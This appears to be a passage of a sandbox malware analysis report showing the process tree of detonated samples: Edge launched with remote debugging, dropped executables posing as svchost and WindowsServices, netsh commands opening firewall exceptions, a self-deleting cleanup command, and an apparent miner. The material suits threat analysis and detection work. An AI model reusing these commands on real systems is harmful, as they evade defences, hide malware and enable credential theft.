        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2240 /prefetch:2
        6⤵
        
        PID:5164
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4852
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6412
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5208 /prefetch:2
        6⤵
        
        PID:12912
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5216 /prefetch:2
        6⤵
        
        PID:2716
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2824 /prefetch:2
        6⤵
        
        PID:5860
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3836 /prefetch:2
        6⤵
        
        PID:12792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:9284
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe7ec746f8,0x7ffe7ec74708,0x7ffe7ec74718
        6⤵
        
        PID:11472
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
        6⤵
        
        PID:11364
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
        6⤵
        
        PID:12732
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
        6⤵
        
        PID:9444
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6116
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4228
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        6⤵
        
        PID:4616
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
        6⤵
        
        PID:4768
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:2
        6⤵
        
        PID:13200
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5076 /prefetch:2
        6⤵
        
        PID:5616
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:9336
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5660
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3040 /prefetch:2
        6⤵
        
        PID:10300
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2964 /prefetch:2
        6⤵
        
        PID:8312
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2068 /prefetch:2
        6⤵
        
        PID:11196
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1392,4663553749471094229,18313836968874540299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5168 /prefetch:2
        6⤵
        
        PID:3508
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:8468
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe7ec746f8,0x7ffe7ec74708,0x7ffe7ec74718
        6⤵
        
        PID:10296
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11923082382752950066,14857912838638598385,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        6⤵
        
        PID:10752
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,11923082382752950066,14857912838638598385,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3
        6⤵
        
        PID:12964
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,11923082382752950066,14857912838638598385,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
        6⤵
        
        PID:8616
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11923082382752950066,14857912838638598385,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:9584
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11923082382752950066,14857912838638598385,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:10912
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11923082382752950066,14857912838638598385,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:8668
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2116,11923082382752950066,14857912838638598385,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:12916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\zcjmo" & exit
        5⤵
        
        PID:9896
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        6⤵
        Delays execution with timeout.exe
        
        PID:10124
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 844
      4⤵
      Program crash
      PID:8596
- - C:\Users\Admin\AppData\Local\Temp\a\csoss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\csoss.exe"
    3⤵
    PID:6872
  - - C:\Program Files (x86)\Google\Temp\GUMBA39.tmp\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Temp\GUMBA39.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
      4⤵
      PID:8396
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
        5⤵
        
        PID:11444
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
        5⤵
        
        PID:11576
      - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        6⤵
        
        PID:11680
      - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        6⤵
        
        PID:11752
      - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        6⤵
        
        PID:11828
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REI0NzAwNEYtMjQ2RC00NkFELTk3NzYtQ0Q4MzYxODZCMkU4fSIgdXNlcmlkPSJ7NENDODIzM0UtNTNCRi00QURELTk1NzMtMkZGMTdCN0M0QkZGfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0Y3QzZDNEIzLURERDAtNEIwRi04MDQ3LTVDNkY4OEM2NEFBRn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjM3MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNTYxMiIvPjwvYXBwPjwvcmVxdWVzdD4
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:11928
    - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{DB47004F-246D-46AD-9776-CD836186B2E8}"
        5⤵
        
        PID:11968
- - C:\Users\Admin\AppData\Local\Temp\a\js.exe
    "C:\Users\Admin\AppData\Local\Temp\a\js.exe"
    3⤵
    PID:2704
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2cehatkx\2cehatkx.cmdline"
      4⤵
      PID:10460
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD6BA.tmp" "c:\Users\Admin\AppData\Local\Temp\2cehatkx\CSCCBB69698DA4349FC9D321568A96C2A.TMP"
        5⤵
        
        PID:11508
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:11620
- - C:\Users\Admin\AppData\Local\Temp\a\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Install.exe"
    3⤵
    PID:10436
- - C:\Users\Admin\AppData\Local\Temp\a\clientside.exe
    "C:\Users\Admin\AppData\Local\Temp\a\clientside.exe"
    3⤵
    PID:13300
  - - C:\Windows\svchost.exe
      "C:\Windows\svchost.exe"
      4⤵
      PID:12600
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:12992
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1116
        5⤵
        
        PID:10952
- - C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WindowsServices.exe"
    3⤵
    PID:4160
  - - C:\Windows\WindowsServices.exe
      "C:\Windows\WindowsServices.exe"
      4⤵
      PID:12720
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Windows\WindowsServices.exe" "WindowsServices.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:10208
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 888
        5⤵
        
        PID:3292
- - C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
    "C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"
    3⤵
    PID:11252
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      PID:8892
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        Kills process with taskkill
        
        PID:8708
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      PID:9920
  - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:8408
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        
        PID:11784
    - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
